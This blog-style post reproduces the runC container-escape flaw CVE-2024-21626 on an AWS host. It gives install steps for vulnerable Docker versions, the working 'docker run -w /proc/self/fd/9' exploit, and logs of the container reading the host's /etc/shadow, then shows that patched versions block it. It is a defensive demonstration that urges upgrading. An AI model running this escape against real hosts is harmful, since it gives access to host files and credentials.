Illustrate runC Escape Vulnerability CVE-2024-21626 with my tests
CVE-2024-21626
The vulnerability CVE-2024-21626 allows an attacker to escape from containers.
For runC, the container runtime component, version 1.1.12 was published on 31 Jan 2024 to fix CVE-2024-21626, a bug that leads to escaping from containers. The affected versions are >= v1.0.0-rc93 and <= 1.1.11.
For containerd, the fixed versions are 1.6.28 and 1.7.13; the affected versions are 1.4.7 to 1.6.27 and 1.7.0 to 1.7.12.
For Docker, the fixed version is 25.0.2.
The test was run on an AWS EC2 instance, using the RHEL-8 AMI image from the AWS Marketplace.
# Use Red Hat 8 as the sample
$ yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo
# To install the older versions, you need to install the containerd
# package first, before the docker service is installed
$ yum list containerd.io --showduplicates
# Then list the docker engine versions. containerd is not pulled in again,
# because it has already been installed (with the old version).
# Run the list command with "--showduplicates"
$ yum list docker-ce --showduplicates
...
# If you want to know all dependencies of "docker-ce", you can run
# "yum install docker-ce" and answer "N" at the confirmation prompt
# So the final installation commands are
sudo yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo
sudo yum install containerd.io-1.6.27-3.1.el8 \
docker-buildx-plugin-0.10.5-1.el8 \
docker-compose-plugin-2.20.2-1.el8 \
docker-ce-cli-1:24.0.4-1.el8 \
docker-ce-rootless-extras-24.0.4-1.el8 \
docker-ce-3:24.0.4-1.el8
Enable the docker service:
$ sudo systemctl start docker
$ sudo systemctl enable docker
# Post-installation steps for Linux,
# for example, give ssm-user permission to run "docker run".
# If the group already exists, ignore the error
$ sudo groupadd docker
$ sudo usermod -aG docker ssm-user
Show the Docker versions; they are all older, vulnerable versions, so the issue can be reproduced now.
sh-4.4$ docker version
Client: Docker Engine - Community
 Version:           24.0.4
 API version:       1.43
 Go version:        go1.20.5
 Git commit:        3713ee1
 Built:             Fri Jul 7 14:52:00 2023
 OS/Arch:           linux/amd64
 Context:           default

Server: Docker Engine - Community
 Engine:
  Version:          24.0.4
  API version:      1.43 (minimum version 1.12)
  Go version:       go1.20.5
  Git commit:       4ffc614
  Built:            Fri Jul 7 14:51:01 2023
  OS/Arch:          linux/amd64
  Experimental:     false
 containerd:
  Version:          1.6.27
  GitCommit:        a1496014c916f9e62104b33d1bb5bd03b0858e59
 runc:
  Version:          1.1.11
  GitCommit:        v1.1.11-0-g4bccb38
 docker-init:
  Version:          0.19.0
  GitCommit:        de40ad0
sh-4.4$
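To decide quickly whether a host still runs one of the vulnerable combinations, the following added script (not part of the original post) parses `docker version` output and compares the Engine, containerd and runc versions against the fixed versions listed above. The sample input is a constructed, abridged copy of the vulnerable output shown above; the range constants and their half-open encoding are assumptions taken from the version numbers in this post.

```python
import re

# Affected ranges as stated in this post, half-open [lo, hi) on (major, minor,
# patch): runc fixed in 1.1.12 (affected >= 1.0.0-rc93, <= 1.1.11), containerd
# fixed in 1.6.28 and 1.7.13 (affected 1.4.7-1.6.27 and 1.7.0-1.7.12), Docker
# fixed in 25.0.2 (the post gives only the fixed version, so older is flagged).
AFFECTED = {
    "runc": [((1, 0, 0), (1, 1, 12))],
    "containerd": [((1, 4, 7), (1, 6, 28)), ((1, 7, 0), (1, 7, 13))],
    "docker": [((0, 0, 0), (25, 0, 2))],
}

def parse_version(text):
    """'v1.1.11' -> (1, 1, 11); '-rc93'-style suffixes are dropped (conservative)."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(x) for x in m.groups())

def is_affected(component, version):
    """True when the version tuple falls inside one of the affected ranges."""
    return any(lo <= version < hi for lo, hi in AFFECTED[component])

def parse_docker_version(output):
    """Extract Engine/containerd/runc versions from `docker version` text.
    Sub-section headers ('Engine:', 'runc:') are lines that end with ':';
    the client 'Version:' line sits under no such header and is skipped."""
    found, section = {}, None
    for line in output.splitlines():
        line = line.strip()
        if line.endswith(":"):
            section = line[:-1].lower()
        elif line.startswith("Version:") and section in ("engine", "containerd", "runc"):
            found["docker" if section == "engine" else section] = line.split(":", 1)[1].strip()
    return found

def assess(output):
    """Map each component to (version string, affected?) for one `docker version` output."""
    return {c: (v, is_affected(c, parse_version(v))) for c, v in parse_docker_version(output).items()}

# Constructed sample: an abridged copy of the vulnerable `docker version`
# output shown above (Docker 24.0.4 / containerd 1.6.27 / runc 1.1.11).
SAMPLE_OLD = """Client: Docker Engine - Community
 Version:    24.0.4
Server: Docker Engine - Community
 Engine:
  Version:   24.0.4
 containerd:
  Version:   1.6.27
 runc:
  Version:   1.1.11
"""
```

Feed it the real output with `assess(subprocess.check_output(["docker", "version"], text=True))`; the runc entry is the decisive one, since that is the component the fix landed in.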
Run the test
I tested several times, with
- /proc/self/fd/7
- /proc/self/fd/8
- /proc/self/fd/9
Finally, the container ran successfully with /proc/self/fd/9:
docker run -w /proc/self/fd/9 --name cve-2024-21626 --rm -it debian:bookworm
So the container can view the host's /etc/hostname and /etc/shadow without mounting any folders from the host at all:
- ip-10-140-11-6.ap-southeast-2.compute.internal
- ssm-user:!!:19760:7:365:7:30::
These values exist only on the AWS EC2 host, not in the container image.
Run the test with the latest Docker versions
Remove the old packages and install the latest Docker:
# clean old version
$ sudo yum remove docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
# install latest version
$ sudo yum install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
# start docker service
$ sudo systemctl start docker
sh-4.4$ docker version
Client: Docker Engine - Community
 Version:           25.0.3
 API version:       1.44
 Go version:        go1.21.6
 Git commit:        4debf41
 Built:             Tue Feb 6 21:15:16 2024
 OS/Arch:           linux/amd64
 Context:           default

Server: Docker Engine - Community
 Engine:
  Version:          25.0.3
  API version:      1.44 (minimum version 1.24)
  Go version:       go1.21.6
  Git commit:       f417435
  Built:            Tue Feb 6 21:14:12 2024
  OS/Arch:          linux/amd64
  Experimental:     false
 containerd:
  Version:          1.6.28
  GitCommit:        ae07eda36dd25f8a1b98dfbf587313b99c0190bb
 runc:
  Version:          1.1.12
  GitCommit:        v1.1.12-0-g51d5e94
 docker-init:
  Version:          0.19.0
  GitCommit:        de40ad0
When running the same command, I can't start the container, so I just run a container without -w /proc/self/fd/8:
$ docker run --name cve --rm -it debian:bookworm bash
root@5d48184c930d:/proc/self/fd# ls
0 1 2 255
# I can't view those files from the host server now
All logs, for your reference:
sh-4.4$ docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
Unable to find image 'debian:bookworm' locally
bookworm: Pulling from library/debian
6a299ae9cfd9: Pull complete
Digest: sha256:79becb70a6247d277b59c09ca340bbe0349af6aacb5afa90ec349528b53ce2c9
Status: Downloaded newer image for debian:bookworm
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/8: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type.
sh-4.4$ docker run -w /proc/self/fd/7 --name cve-2024-21626 --rm -it debian:bookworm
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/7: no such file or directory: unknown.
sh-4.4$ docker run -w /proc/self/fd/6 --name cve-2024-21626 --rm -it debian:bookworm
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/6: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type.
sh-4.4$ docker run -w /proc/self/fd/9 --name cve-2024-21626 --rm -it debian:bookworm
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@a3238ac6f149:.# pwd
pwd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@a3238ac6f149:.# ls -F
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
blkio/ cpu@ cpu,cpuacct/ cpuacct@ cpuset/ devices/ freezer/ hugetlb/ memory/ net_cls@ net_cls,net_prio/ net_prio@ perf_event/ pids/ rdma/ systemd/
root@a3238ac6f149:.# ls ../../../../../
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
bin boot data dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
root@a3238ac6f149:.# ls ../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
../../../../../etc/hostname
root@a3238ac6f149:.# ls ../../../../../etc/shadow
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
../../../../../etc/shadow
root@a3238ac6f149:.# cat ../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
ip-10-140-11-6.ap-southeast-2.compute.internal
root@a3238ac6f149:.# cat ../../../../../etc/shadow
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root:*:19324:0:99999:7:::
bin:*:19324:0:99999:7:::
daemon:*:19324:0:99999:7:::
adm:*:19324:0:99999:7:::
lp:*:19324:0:99999:7:::
sync:*:19324:0:99999:7:::
shutdown:*:19324:0:99999:7:::
halt:*:19324:0:99999:7:::
mail:*:19324:0:99999:7:::
operator:*:19324:0:99999:7:::
games:*:19324:0:99999:7:::
ftp:*:19324:0:99999:7:::
nobody:*:19324:0:99999:7:::
dbus:!!:19725::::::
systemd-coredump:!!:19725::::::
systemd-resolve:!!:19725::::::
tss:!!:19725::::::
polkitd:!!:19725::::::
unbound:!!:19725::::::
sssd:!!:19725::::::
chrony:!!:19725::::::
sshd:!!:19725::::::
ec2-user:!!:19759:0:99999:7:::
cwagent:!!:19759::::::
rpc:!!:19759:7:365:7:30::
rpcuser:!!:19759::::::
splunk:!!:19759:7:365:7:30::
ssm-user:!!:19760:7:365:7:30::
root@a3238ac6f149:.# pwd
pwd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
Conclusion
The vulnerability CVE-2024-21626 not only enables malicious actors to escape containerized environments but also allows full control over the underlying host system.
Please upgrade (with yum or apt) your operating system as soon as possible. The CVE is very new, so the patch may not be ready yet for some operating systems, and if your OS has reached EOL, there will be no patch for this CVE at all.
References
Nitro's Blog: Illustrate runC Escape Vulnerability CVE-2024-21626
Containers inherit breakout bugs in Linux tools
Red Hat CVE Status: CVE-2024-21626
Ubuntu CVE status: CVE-2024-21626
Learning is fun
# CVE-2024-21626 # Security # Docker # Kubernetes